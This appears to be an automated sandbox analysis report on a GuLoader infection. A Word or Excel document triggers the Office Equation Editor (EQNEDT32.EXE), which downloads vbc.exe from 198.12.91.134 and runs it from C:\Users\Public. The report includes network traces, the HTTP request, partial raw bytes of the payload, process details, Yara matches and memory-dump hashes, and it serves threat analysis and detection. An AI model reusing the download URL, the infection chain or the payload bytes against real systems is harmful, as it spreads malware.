      Jul 20, 2021 14:02:41.721502066 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721503019 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.721515894 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721518040 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.721533060 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.721549988 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.724216938 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.856997013 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857211113 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857212067 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857239962 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857253075 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857264042 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857275009 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857285976 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857299089 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857310057 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857320070 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857331038 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857350111 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857353926 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857372999 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857376099 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857384920 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857400894 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857409954 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857423067 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857429028 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857443094 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857453108 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857465029 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857475996 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857487917 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857496977 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857507944 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857516050 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857528925 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857537031 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857551098 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857561111 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857575893 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857579947 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857599020 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857605934 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857620001 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857628107 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857641935 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857649088 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857662916 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857671022 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857685089 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857693911 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857707024 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857709885 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857728004 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857736111 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857752085 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857755899 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857774019 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857780933 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857795954 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857804060 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857817888 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857827902 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857840061 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857846975 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857860088 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.857871056 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.857892036 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.860497952 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.993609905 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993654013 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993683100 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993688107 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.993705988 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993729115 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993732929 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.993752003 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993760109 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.993773937 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993788004 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.993798971 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993823051 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993830919 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.993848085 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993869066 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.993872881 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993905067 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.993912935 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993937016 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993957043 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.993978977 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.994000912 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.994035959 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.994051933 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.994060993 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.994066954 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.994070053 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.994071960 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.994083881 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.994105101 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.994115114 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.994127989 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.994153023 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.994163036 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.994174957 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.994196892 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.994198084 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.994210005 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.994220018 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.994226933 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.994316101 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.996525049 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.997090101 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.997138023 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.997152090 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.997174025 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.997190952 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.997210026 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.997221947 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.997256994 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.997270107 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.997309923 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.997328997 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.997385025 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:42.000879049 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:42.003982067 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:42.523250103 CEST  49165        80         192.168.2.22   198.12.91.134

      HTTP Request Dependency Graph

      • 198.12.91.134

      HTTP Packets

      Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
      0           192.168.2.22  49165        198.12.91.134   80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Timestamp  kBytes transferred  Direction  Data
      Jul 20, 2021 14:02:41.307029009 CEST  0  OUT
      GET /hkcmd/vbc.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 198.12.91.134
      Connection: Keep-Alive
      Jul 20, 2021 14:02:41.445785046 CEST  2  IN
      HTTP/1.1 200 OK
      Date: Tue, 20 Jul 2021 12:02:40 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      Last-Modified: Tue, 20 Jul 2021 09:26:12 GMT
      ETag: "1d000-5c78aa51b4a66"
      Accept-Ranges: bytes
      Content-Length: 118784
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e6 21 01 51 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 40 01 00 00 90 00 00 00 00 00 00 28 11 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 10 00 00 38 e2 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 4b 01 00 28 00 00 00 00 70 01 00 6a 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 3d 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 5c 11 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 6a 6d 00 00 00 70 01 00 00 70 00 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#BBBL^B`BdBRichBPEL!Q@(P@8DK(pjm( t.text=@ `.data\PP@.rsrcjmpp`@@IMSVBVM60.DLL
      Jul 20, 2021 14:02:41.445816040 CEST  3  IN
      Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Jul 20, 2021 14:02:41.445833921 CEST  4  IN
      Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Jul 20, 2021 14:02:41.445851088 CEST  6  IN
      Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Jul 20, 2021 14:02:41.582732916 CEST  7  IN
      Data Raw: fd e3 ea 71 b2 fd 57 71 b4 f3 72 71 8e 8e 8e 71 71 1f ea 71 52 05 b3 71 72 e3 b2 71 43 f2 a9 71 2a a7 9b 71 50 02 f4 71 71 10 fc 71 33 e8 95 71 47 ab 9c 71 6d dd a4 71 0e 0d 0a 71 62 07 ea 71 ae c2 15 71 9e 9f 9f 71 ee 18 77 71 21 b6 92 71 fc 95
      Data Ascii: qWqrqqqqRqrqCq*qPqqq3qGqmqqbqqqwq!qqLq^qq5qfqq@qD.qq]qqq7qHqqq0q.q1qqqqqc(qqqqiqqqq>qqlqSq@-qkqq>q2qq| qk
      Jul 20, 2021 14:02:41.582770109 CEST  9  IN
      Data Raw: 28 c6 b6 b6 b6 b6 b6 b6 b6 55 0d 0d 6c 30 73 73 fc c0 b0 e5 32 27 ae 0d 0d 70 70 e3 e3 6a ac 3a 61 b3 b3 b3 b3 b3 c1 c1 c1 c1 61 61 3a 45 af af 28 ad 53 53 53 53 53 53 16 6c 0d 0d 0d 8c 73 73 b6 39 d0 32 32 51 25 6c 0d 70 70 e3 e3 c2 ac c8 2e 2e
      Data Ascii: (Ul0ss2'ppj:aaa:E(SSSSSSlss922Q%lpp....mmmmmmmm44QAAAAAssshQ%lpp.mmm5kWv+++++s"'lppjjrrrr````DUlSSs9'"ppjj$[N
      Jul 20, 2021 14:02:41.582791090 CEST  10  IN
      Data Raw: de 5a 0f 0f 52 47 0f 62 00 e9 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 f5 f5 f5 23 1b 4f 0c ad cc c9 de 5a 0f 0f 3e fd ca 46 00 00 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70
      Data Ascii: ZRGbpppppppppppppppppppppppppppp#OZ>FpppppppppppppppppppppppppppppP>1Fppppppppppppppppppppppppppppppx#WWWGpppppppppppppppppppppppppppppppxGpppppppppppppppppppppppppppppppppxx773
      Jul 20, 2021 14:02:41.582817078 CEST  11  IN
      Data Raw: 4a 71 00 f9 f4 71 06 bf 88 71 5f 0c a0 71 62 d7 a4 71 e3 86 8e 71 d4 01 7c 71 39 fe df 71 9c d6 7f 71 7c 3c e8 71 3b db 9c 71 34 ef 9d 71 a5 e0 7d 71 75 21 d6 71 73 2f e8 71 b1 0a 71 71 46 c0 a1 71 5b 16 d4 71 71 24 f4 71 51 f8 df 71 e2 0a 25 71
      Data Ascii: Jqqq_qbqq|q9qq|<q;q4q}qu!qs/qqqFq[qq$qQq%qZqQqqq_qqqq]qTqqKqqq;qqbq@q*q3qqqqqX%qqd/qq^qqqnqqqqqq<qqqqbq(qq;q
      Jul 20, 2021 14:02:41.582909107 CEST  13  IN
      Data Raw: 15 15 6a 7b db db 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 a0 a0 0f 06 e9 da c0 18 82 3a a8 94 3b 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 a0 a2 4c 54 99 06 41 46 a4 3a ed 3c 3c 70 70 70 70 70 70 70 70 70 70 70 70 70
      Data Ascii: j{pppppppppppppppppp:;pppppppppppppppppppLTAF:<<ppppppppppppppppppppTTpppppppppppppppppppppp6ksppppppppppppppppppppppppkksppppppppppppppppppppppppppppppppppppppppppppppppppnpqvqqrqqrqqpqqpqq
      Jul 20, 2021 14:02:41.582931995 CEST  14  IN
      Data Raw: 8a 71 71 2f fb 71 a5 fd 73 71 33 ed 92 71 61 d2 a0 71 94 cb 03 71 40 c4 bf 71 5a 2b f7 71 99 c6 14 71 52 2f d0 71 71 1a fd 71 e8 90 8a 71 4b e5 af 71 97 cb 1f 71 e5 0a 02 71 40 f8 af 71 68 f7 df 71 24 24 24 24 24 24 24 24 24 24 24 24 24 24 0b 0b
      Data Ascii: qq/qsq3qaqq@qZ+qqR/qqqqKqqq@qhq$$$$$$$$$$$$$$$$$$$$$$$uutttt$$$$uuu~$$<72V'VGD$EEE,#(q32=/,,<gX%RRR=V,,kXkk}F|KRa8b-};;
      Jul 20, 2021 14:02:41.582957983 CEST  16  IN
      Data Raw: 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71
      Data Ascii: qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq


      Code Manipulations

      Statistics

      CPU Usage

      Memory Usage

      High Level Behavior Distribution

      Behavior

      System Behavior

      General

      Start time: 14:01:44
      Start date: 20/07/2021
      Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit): false
      Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase: 0x13f960000
      File size: 27641504 bytes
      MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
      Has elevated privileges: true
      Has administrator privileges: true
      Programmed in: C, C++ or other language
      Reputation: high

      General

      Start time: 14:02:05
      Start date: 20/07/2021
      Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit): true
      Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Imagebase: 0x400000
      File size: 543304 bytes
      MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges: true
      Has administrator privileges: true
      Programmed in: C, C++ or other language
      Reputation: high

      General

      Start time: 14:02:07
      Start date: 20/07/2021
      Path: C:\Users\Public\vbc.exe
      Wow64 process (32bit): true
      Commandline: 'C:\Users\Public\vbc.exe'
      Imagebase: 0x400000
      File size: 118784 bytes
      MD5 hash: C8FEB9D53B567CD1BFB0E59CF7D26BC2
      Has elevated privileges: true
      Has administrator privileges: true
      Programmed in: Visual Basic
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security
      Antivirus matches:
      • Detection: 100%, Joe Sandbox ML
      Reputation: low

      Disassembly

      Code Analysis

        Executed Functions

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362112152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2362108532.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000006.00000002.2362119626.0000000000415000.00000004.00020000.sdmp
        • Associated: 00000006.00000002.2362123294.0000000000417000.00000002.00020000.sdmp
        Similarity
        • API ID: #100
        • String ID: 1%nB$VB5!6&*$q
        • API String ID: 1341478452-1418848133
        • Opcode ID: 0bb2582355f795bb24e430a3c1cb97c7a51ba9a4cd9eece23b16decd8ea0fbc3
        • Instruction ID: d91c6dda3393b829e1e0181ca1c959403ab251d6e7d627793f2febcae7cdbe5c
        • Opcode Fuzzy Hash: 0bb2582355f795bb24e430a3c1cb97c7a51ba9a4cd9eece23b16decd8ea0fbc3
        • Instruction Fuzzy Hash: 7D5236614097C05EC70B4A348E2D2567F72AAA336679905FBC481BF1F3D1BE4886C76D
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • NtAllocateVirtualMemory.NTDLL ref: 003D5831
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID: AllocateMemoryVirtual
        • String ID:
        • API String ID: 2167126740-0
        • Opcode ID: 9f91272f6e657931e931bc11078f44329d0a32fed0546ca9402c6b910abdd505
        • Instruction ID: 9b4c859cfb81fc289a33c9d8d1eed792db24b767a2aa5253e05efdeeace1116e
        • Opcode Fuzzy Hash: 9f91272f6e657931e931bc11078f44329d0a32fed0546ca9402c6b910abdd505
        • Instruction Fuzzy Hash: 74918473A14788CFDB32DF65EC917DA7BA2EF99350F54004AE8988B311C331C9868B52
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • NtAllocateVirtualMemory.NTDLL ref: 003D5831
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID: AllocateMemoryVirtual
        • String ID:
        • API String ID: 2167126740-0
        • Opcode ID: 5cb0876ce9c7cf8b2980f8c56672f8649f987f5f4b06e06eac3a9bdd1736a751
        • Instruction ID: e39c77ec858e95834dc2d386b5a24bd8bc013764bc7c1be3207745215622e9bb
        • Opcode Fuzzy Hash: 5cb0876ce9c7cf8b2980f8c56672f8649f987f5f4b06e06eac3a9bdd1736a751
        • Instruction Fuzzy Hash: 4521B072611688CFEB71CF64EC80BD977A2EF89324F24451ADC4C9B220C730DA81DB05
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: K{:$k7DL$x )$x )
        • API String ID: 0-573531396
        • Opcode ID: cbbf0c4bff7bba9aa70f88f6d8d7e7a4481093a49bdb4e16a2b92185206b80a0
        • Instruction ID: a324a6466816f4126021452a5d67875afd49cb320dca7f34d854d2f8948d548e
        • Opcode Fuzzy Hash: cbbf0c4bff7bba9aa70f88f6d8d7e7a4481093a49bdb4e16a2b92185206b80a0
        • Instruction Fuzzy Hash: 663219715083C58FDB36CF38DC987DABBA2AF52320F59C29AC8998F296D7309541C716
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: ZYa$\l9
        • API String ID: 0-2703591555
        • Opcode ID: b1a142def564d13704610064d2668329b4fc718ac94f451c10cf0608110cb812
        • Instruction ID: 48740b54340ce10f4d33dd16683537a892f05847faed42369486fc563a337b02
        • Opcode Fuzzy Hash: b1a142def564d13704610064d2668329b4fc718ac94f451c10cf0608110cb812
        • Instruction Fuzzy Hash: A562FC726043899FDB759F38C9957DABBB2FF54350F51812EEC8A9B210C3719A81CB42
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: ZYa$\l9
        • API String ID: 0-2703591555
